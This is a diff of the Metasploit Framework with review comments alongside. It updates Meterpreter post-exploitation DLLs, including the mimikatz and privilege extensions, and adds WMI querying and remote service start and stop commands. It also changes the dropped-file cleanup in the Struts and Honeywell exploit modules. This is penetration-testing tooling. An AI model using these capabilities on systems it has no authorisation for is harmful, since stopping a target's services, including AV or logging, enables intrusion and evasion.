diff --git a/data/meterpreter/common.lib b/data/meterpreter/common.lib
index 75b5eb755b..dc6eda3974 100755
Binary files a/data/meterpreter/common.lib and b/data/meterpreter/common.lib differ
diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll
index 5d97d4617f..5704ed065d 100755
Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ
diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll
index 59b71b8b00..5162e25b34 100755
Binary files a/data/meterpreter/elevator.x86.dll and b/data/meterpreter/elevator.x86.dll differ
diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll
index 2c4f278a4b..c3297a20ac 100755
Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ
diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll
index 34e6757142..9f4938354a 100755
Binary files a/data/meterpreter/ext_server_espia.x86.dll and b/data/meterpreter/ext_server_espia.x86.dll differ
diff --git a/data/meterpreter/ext_server_extapi.x64.dll b/data/meterpreter/ext_server_extapi.x64.dll
index 4e3d4728e5..485311ec94 100755
Binary files a/data/meterpreter/ext_server_extapi.x64.dll and b/data/meterpreter/ext_server_extapi.x64.dll differ
diff --git a/data/meterpreter/ext_server_extapi.x86.dll b/data/meterpreter/ext_server_extapi.x86.dll
index e297c627c2..985a510475 100755
Binary files a/data/meterpreter/ext_server_extapi.x86.dll and b/data/meterpreter/ext_server_extapi.x86.dll differ
diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll
index 278e6dd39e..faed750330 100755
Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ
diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll
index 732977bfae..98198341b3 100755
Binary files a/data/meterpreter/ext_server_incognito.x86.dll and b/data/meterpreter/ext_server_incognito.x86.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll
index f45475fd86..294ef2261a 100755
Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll
index 03bebdfe1e..ef92743241 100755
Binary files a/data/meterpreter/ext_server_lanattacks.x86.dll and b/data/meterpreter/ext_server_lanattacks.x86.dll differ
diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll
index 1ce9f75e8c..2d10147d47 100755
Binary files a/data/meterpreter/ext_server_mimikatz.x64.dll and b/data/meterpreter/ext_server_mimikatz.x64.dll differ
diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll
index 4bdc358efe..88df3a70e3 100755
Binary files a/data/meterpreter/ext_server_mimikatz.x86.dll and b/data/meterpreter/ext_server_mimikatz.x86.dll differ
diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll
index 2a69f8e02a..f13693d08b 100755
Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ
diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll
index d16d2f4280..0e61427ac4 100755
Binary files a/data/meterpreter/ext_server_priv.x86.dll and b/data/meterpreter/ext_server_priv.x86.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll
index 45845edb63..8c96c6c836 100755
Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll
index 9f21e8379b..ed5983658d 100755
Binary files a/data/meterpreter/ext_server_stdapi.x86.dll and b/data/meterpreter/ext_server_stdapi.x86.dll differ
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
index 6dddf1056a..b80d35d745 100755
Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ
diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll
index e5c7373f56..15efbb9495 100755
Binary files a/data/meterpreter/metsrv.x86.dll and b/data/meterpreter/metsrv.x86.dll differ
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
index 91f123da9c..7eb1f3f307 100755
Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ
diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll
index c35ccb08bf..3699d2ae0c 100755
Binary files a/data/meterpreter/screenshot.x86.dll and b/data/meterpreter/screenshot.x86.dll differ
diff --git a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
index 82a58b8361..609f2ab5e4 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
@@ -134,14 +134,16 @@ private result[ts]['Text'] = t.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT) end - response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f| - ts = f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP) + response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES) do |fs| + ts = fs.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP) result[ts] ||= {} result[ts]['Files'] ||= [] - result[ts]['Files'] << { - :name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME), - :size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE) - } + fs.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f| + result[ts]['Files'] << { + :name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME), + :size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE) + } + end end response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg| diff --git a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb index 08408e3489..31a3cd45af 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb @@ -5,6 +5,7 @@ require 'rex/post/meterpreter/extensions/extapi/window/window' require 'rex/post/meterpreter/extensions/extapi/service/service' require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard' require 'rex/post/meterpreter/extensions/extapi/adsi/adsi' +require 'rex/post/meterpreter/extensions/extapi/wmi/wmi' module Rex module Post 
@@ -29,10 +30,11 @@ class Extapi < Extension 'name' => 'extapi', 'ext' => ObjectAliases.new( { - 'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client), - 'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client), + 'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client), + 'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client), 'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client), - 'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client) + 'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client), + 'wmi' => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client) }) }, ]) diff --git a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb index 86fbc7d148..0318c1aeac 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb @@ -15,18 +15,26 @@ module Service ### class Service + SERVICE_OP_START = 1 + SERVICE_OP_PAUSE = 2 + SERVICE_OP_RESUME = 3 + SERVICE_OP_STOP = 4 + SERVICE_OP_RESTART = 5 + def initialize(client) @client = client end + # # Enumerate all the services on the target. + # def enumerate request = Packet.create_request('extapi_service_enum') response = client.send_request(request) services = [] - response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) { |s| + response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) do |s| services << { :name => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME), :display => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME), 
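Review bot: The new `SERVICE_OP_START` … `SERVICE_OP_RESTART` constants in `Service` carry no comment saying they are wire values consumed by the server side of `extapi_service_control`, so a future renumbering here would silently desynchronise the client from the extension DLL that ships in this same commit. I would put above `SERVICE_OP_START = 1`: `# Operation codes sent in TLV_TYPE_EXT_SERVICE_CTRL_OP; they must stay in step with the extapi server extension.` The `{ }` to `do/end` change in `enumerate` is style only and consistent with the rest of the file. The `enumerate` body runs past the end of this hunk.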
@@ -34,29 +42,59 @@ class Service :status => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS), :interactive => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE) } - } + end - return services.sort_by { |s| s[:name].upcase } + services.sort_by { |s| s[:name].upcase } end + # # Query some detailed parameters about a particular service. + # def query(service_name) request = Packet.create_request('extapi_service_query') request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name) response = client.send_request(request) - detail = { + { :starttype => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE), :display => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME), :startname => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME), :path => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH), :logroup => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP), :interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE), - :dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL) + :dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL), + :status => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STATUS) } + end - return detail + # + # Control a single service + # + def control(service_name, op) + if op.is_a? String + case op.strip.downcase + when "start" + op = SERVICE_OP_START + when "pause" + op = SERVICE_OP_PAUSE + when "resume" + op = SERVICE_OP_RESUME + when "stop" + op = SERVICE_OP_STOP + when "restart" + op = SERVICE_OP_RESTART + end + end + + unless (op.is_a? Integer) && op >= SERVICE_OP_START && op <= SERVICE_OP_RESTART + raise ArgumentError, "Invalid operation: #{op}" + end + + request = Packet.create_request('extapi_service_control') + request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name) + request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op) + client.send_request(request) end attr_accessor :client 
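Review bot: `control` is the first method in this class that changes state on the target rather than reading it, yet its header is the one-liner `# Control a single service`, so a caller cannot tell that `op` may be a name or a code, that an unrecognised value raises `ArgumentError`, or what a failed request does (presumably `send_request` raises; that is not visible here). I would document it in the YARD style the new `Wmi#query` uses: `# @param service_name [String] Name of the service to control.`, `# @param op [String, Integer] One of start/pause/resume/stop/restart, or the matching SERVICE_OP_* code.`, `# @raise [ArgumentError] if op is not a recognised operation.` A sentence that stopping or restarting a service is a visible and potentially disruptive action on the target would also be welcome, since this is what operators will reach for against AV or logging services. The `:status` added to `query` lines up with the new `TLV_TYPE_EXT_SERVICE_QUERY_STATUS` constant.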
diff --git a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb index d7a2fff3ec..55ad544dc1 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb @@ -27,6 +27,10 @@ TLV_TYPE_EXT_SERVICE_QUERY_PATH = TLV_META_TYPE_STRING | (TLV_TYPE_E TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24) TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25) TLV_TYPE_EXT_SERVICE_QUERY_DACL = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26) +TLV_TYPE_EXT_SERVICE_QUERY_STATUS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 27) + +TLV_TYPE_EXT_SERVICE_CTRL_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 28) +TLV_TYPE_EXT_SERVICE_CTRL_OP = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 29) TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35) @@ -38,6 +42,7 @@ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLV_META_TYPE_STRING | (TLV_TYPE_E TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41) TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42) TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43) +TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44) TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45) TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46) 
@@ -57,6 +62,14 @@ TLV_TYPE_EXT_ADSI_RESULT = TLV_META_TYPE_GROUP | (TLV_TYPE_E TLV_TYPE_EXT_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60) TLV_TYPE_EXT_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61) +TLV_TYPE_EXT_WMI_DOMAIN = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 65) +TLV_TYPE_EXT_WMI_QUERY = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 66) +TLV_TYPE_EXT_WMI_FIELD = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 67) +TLV_TYPE_EXT_WMI_VALUE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 68) +TLV_TYPE_EXT_WMI_FIELDS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69) +TLV_TYPE_EXT_WMI_VALUES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70) +TLV_TYPE_EXT_WMI_ERROR = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 71) + end end end diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb new file mode 100644 index 0000000000..c6351318bd --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb 
@@ -0,0 +1,75 @@ +# -*- coding: binary -*- + +module Rex +module Post +module Meterpreter +module Extensions +module Extapi +module Wmi + +### +# +# This meterpreter extension contains extended API functions for +# performing WMI queries. +# +### +class Wmi + + def initialize(client) + @client = client + end + + # + # Perform a generic wmi query against the target machine. + # + # @param query [String] The WMI query string. + # @param root [String] Specify root to target, otherwise defaults + # to 'root\cimv2' + # + # @returns [Hash] Array of field names with associated values. + # + def query(query, root = nil) + request = Packet.create_request('extapi_wmi_query') + + request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank? + request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query) + + response = client.send_request(request) + + # Bomb out with the right error messa + error_msg = response.get_tlv_value(TLV_TYPE_EXT_WMI_ERROR) + raise error_msg if error_msg + + fields = [] + fields_tlv = response.get_tlv(TLV_TYPE_EXT_WMI_FIELDS) + + # If we didn't get any fields back, then we didn't get any results. + # The reason is because without results, we don't know which fields + # were requested in the first place + return nil unless fields_tlv + + fields_tlv.each(TLV_TYPE_EXT_WMI_FIELD) { |f| + fields << f.value + } + + values = [] + response.each(TLV_TYPE_EXT_WMI_VALUES) { |r| + value = [] + r.each(TLV_TYPE_EXT_WMI_VALUE) { |v| + value << v.value + } + values << value + } + + return { + :fields => fields, + :values => values + } + end + + attr_accessor :client + +end + +end; end; end; end; end; end + diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb index 40df85f5f8..326c837d3f 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb 
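Review bot: `raise error_msg if error_msg` in `Wmi#query` raises a bare `RuntimeError` whose message is a string supplied by the target, so callers cannot rescue WMI failures selectively and the text that reaches the console is target-controlled; a dedicated error class, or at least `raise "WMI query failed: #{error_msg}"`, would make the origin obvious. The comment above it is truncated (`# Bomb out with the right error messa`) and the tag should be `# @return [Hash, nil] :fields and :values arrays, or nil when the query produced no rows` to match the `return nil unless fields_tlv` path (`@returns` is not a YARD tag). `root.blank?` comes from ActiveSupport rather than core Ruby, so this Rex-level class only works while the framework keeps ActiveSupport loaded; `root.nil? || root.empty?` has no such dependency.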
@@ -17,6 +17,7 @@ class Console::CommandDispatcher::Extapi require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service' require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard' require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi' + require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi' Klass = Console::CommandDispatcher::Extapi @@ -25,7 +26,8 @@ class Console::CommandDispatcher::Extapi Klass::Window, Klass::Service, Klass::Clipboard, - Klass::Adsi + Klass::Adsi, + Klass::Wmi ] include Console::CommandDispatcher diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb index 7896e10a3a..5b0895fb2c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb @@ -22,8 +22,9 @@ class Console::CommandDispatcher::Extapi::Service # def commands { - "service_enum" => "Enumerate all registered Windows services", - "service_query" => "Query more detail about a specific Windows service" + "service_enum" => "Enumerate all registered Windows services", + "service_query" => "Query more detail about a specific Windows service", + "service_control" => "Control a single service (start/pause/resume/stop/restart)" } end @@ -33,6 +34,32 @@ class Console::CommandDispatcher::Extapi::Service def name "Extapi: Service Management" end + + # + # Initialize the instance + # + def initialize(shell) + super + + @status_map = { + 1 => "Stopped", + 2 => "Starting", + 3 => "Stopping", + 4 => "Running", + 5 => "Continuing", + 6 => "Pausing", + 7 => "Paused" + } + + @start_type_map = { + 0 => "Boot", + 1 => "System", + 2 => "Automatic", + 3 => "Manual", + 4 => "Disabled" + } + end + # # Options for the service_enum command. # 
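Review bot: `initialize(shell)` in the service dispatcher rebuilds `@status_map` and `@start_type_map` as fresh hashes for every dispatcher instance although they are immutable lookup tables, and per-instance state is unusual in this file, where the option parsers are class-level `@@` values. Frozen constants, `STATUS_MAP = { 1 => "Stopped", 2 => "Starting", 3 => "Stopping", 4 => "Running", 5 => "Continuing", 6 => "Pausing", 7 => "Paused" }.freeze` and `START_TYPE_MAP = { 0 => "Boot", 1 => "System", 2 => "Automatic", 3 => "Manual", 4 => "Disabled" }.freeze`, give the same lookups without the `initialize` override. If the override stays, the comment `# Initialize the instance` should say what it sets up rather than restate the method name.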
@@ -44,7 +71,7 @@ class Console::CommandDispatcher::Extapi::Service # Query a single service for more detail. # def cmd_service_enum(*args) - @@service_enum_opts.parse(args) { |opt, idx, val| + @@service_enum_opts.parse(args) do |opt, idx, val| case opt when "-h" print( @@ -55,17 +82,7 @@ class Console::CommandDispatcher::Extapi::Service "able to interact with the desktop.\n\n") return true end - } - - status_map = { - 1 => "Stopped", - 2 => "Starting", - 3 => "Stopping", - 4 => "Running", - 5 => "Continuing", - 6 => "Pausing", - 7 => "Paused" - } + end services = client.extapi.service.enumerate @@ -78,14 +95,14 @@ class Console::CommandDispatcher::Extapi::Service ] ) - services.each { |s| + services.each do |s| table << [ s[:pid], - status_map[s[:status]], + @status_map[s[:status]], s[:interactive] ? "Y" : "N", "#{s[:name].downcase} (#{s[:display]})" ] - } + end print_line print_line(table.to_s) @@ -107,9 +124,9 @@ class Console::CommandDispatcher::Extapi::Service # Query a single service for more detail. # def cmd_service_query(*args) - args << "-h" if args.length == 0 + args.unshift("-h") if args.length != 1 - @@service_query_opts.parse(args) { |opt, idx, val| + @@service_query_opts.parse(args) do |opt, idx, val| case opt when "-h" print( 
@@ -119,25 +136,18 @@ class Console::CommandDispatcher::Extapi::Service "binary path, DACL, load order group, start type and more.\n\n") return true end - } + end service_name = args.shift - start_type_map = { - 0 => "Boot", - 1 => "System", - 2 => "Automatic", - 3 => "Manual", - 4 => "Disabled" - } - detail = client.extapi.service.query(service_name) print_line print_line("Name : #{service_name}") print_line("Display : #{detail[:display]}") print_line("Account : #{detail[:startname]}") - print_line("Start Type : #{start_type_map[detail[:starttype]]}") + print_line("Status : #{@status_map[detail[:status]]}") + print_line("Start Type : #{@start_type_map[detail[:starttype]]}") print_line("Path : #{detail[:path]}") print_line("L.O. Group : #{detail[:logroup]}") print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}") @@ -146,6 +156,39 @@ class Console::CommandDispatcher::Extapi::Service end + # + # Options for the service_control command. + # + @@service_control_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ] + ) + + # + # Query a single service for more detail. + # + def cmd_service_control(*args) + args.unshift("-h") if args.length != 2 + + @@service_control_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + print( + "\nUsage: service_control [-h] \n" + + " : The name of the service to control.\n" + + " : The operation to perform on the service.\n" + + " Valid ops: start pause resume stop restart.\n\n") + return true + end + end + + service_name = args[0] + op = args[1] + + client.extapi.service.control(service_name, op) + + print_good("Operation #{op} succeeded.") + end + end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb new file mode 100644 index 0000000000..d4670fb42b --- /dev/null +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb 
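Review bot: The header comment above `cmd_service_control` reads `# Query a single service for more detail.`, copied from `cmd_service_query`; it should say `# Start, pause, resume, stop or restart a single service on the target.` The usage text `"\nUsage: service_control [-h] \n"` appears to have lost its two positional placeholders (possibly in extraction); if so it should read `"\nUsage: service_control [-h] <name> <op>\n"` so the two description lines that follow make sense. `client.extapi.service.control` raises `ArgumentError` for an unknown op (per the library hunk) and the request itself can fail, but the command neither rescues nor reports, so a typo surfaces as a raw exception rather than a `print_error`; wrapping the call as `begin; client.extapi.service.control(service_name, op); rescue ArgumentError => e; print_error(e.message); return false; end` keeps the console usable. Because stop/restart can take down logging, AV, or the very service the session depends on, a one-line caveat in the help banner would be appropriate.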
@@ -0,0 +1,108 @@ +# -*- coding: binary -*- +require 'rex/post/meterpreter' + +module Rex +module Post +module Meterpreter +module Ui + +### +# +# Extended API WMI Querying interface. +# +### +class Console::CommandDispatcher::Extapi::Wmi + + Klass = Console::CommandDispatcher::Extapi::Wmi + + include Console::CommandDispatcher + + # Zero indicates "no limit" + DEFAULT_MAX_RESULTS = 0 + DEFAULT_PAGE_SIZE = 0 + + # + # List of supported commands. + # + def commands + { + "wmi_query" => "Perform a generic WMI query and return the results" + } + end + + # + # Name for this dispatcher + # + def name + "Extapi: WMI Querying" + end + + # + # Options for the wmi_query command. + # + @@wmi_query_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ], + "-r" => [ true, "Specify a different root object (defaults to 'root\\CIMV2')" ] + ) + + def wmi_query_usage + print( + "\nUsage: wmi_query [-r root]\n\n" + + "Query the target and display the results.\n\n" + + @@wmi_query_opts.usage) + end + + # + # Enumerate WMI objects. + # + def cmd_wmi_query(*args) + args.unshift("-h") if args.length < 1 + + root = nil + + @@wmi_query_opts.parse(args) { |opt, idx, val| + case opt + when "-r" + root = val + when "-h" + wmi_query_usage + return true + end + } + + query = args.shift + + objects = client.extapi.wmi.query(query, root) + + if objects + table = Rex::Ui::Text::Table.new( + 'Header' => query, + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => objects[:fields] + ) + + objects[:values].each do |c| + table << c + end + + print_line + print_line(table.to_s) + + print_line("Total objects: #{objects[:values].length}") + else + print_status("The WMI query yielded no results.") + end + + print_line + + return true + end + +end + +end +end +end +end + diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index 709cbaabe0..c10c682eb4 100644 
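Review bot: `cmd_wmi_query` takes the query as `args.shift` after the parse, which only works when the query string is the first token; if `Rex::Parser::Arguments#parse` yields option tokens without removing them from `args` (as I believe it does), `wmi_query -r root\cimv2 "select ..."` would send `-r` to the target as the query. Collecting the positional inside the parse block, `when nil then query = val`, and returning usage when `query` is still nil after parsing, works regardless of option order. `DEFAULT_MAX_RESULTS` and `DEFAULT_PAGE_SIZE` are defined but never referenced in this file, so they look carried over from the ADSI dispatcher and should be wired up or dropped. The usage line `"\nUsage: wmi_query [-r root]\n\n"` also appears to have lost its query placeholder, possibly in extraction.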
--- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index b45c11bdb7..626da8d3a4 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") - end - @dropped_files.delete_if do |file| - win_file = file.gsub("/", "\\\\") - if session.type == "meterpreter" + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") begin - wintemp = session.fs.file.expand_path("%TEMP%") + wintemp = session.sys.config.getenv('TEMP') win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) @@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Failed to delete #{win_file}") false end - end end end diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 6ffb606ea9..7138d2004d 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb 
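Review bot: In `struts_default_action_mapper.rb`, `session.sys.config.getenv('TEMP')` may return nil when the variable is absent on the target (whether it returns nil or raises is not visible here), and the next line then silently builds `"\\#{win_file}"` and runs `attrib.exe -r` and `rm` against a drive-root path instead of the temp directory; a `next false if wintemp.nil?` before `win_file` is built keeps the cleanup honest. The same applies to the two `honeywell_hscremotedeploy_exec.rb` hunks on this line, which make the identical substitution. The surrounding `on_new_session`/`delete_if` block starts before and ends after what the hunk shows, so the `rescue` arm is unverified here.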
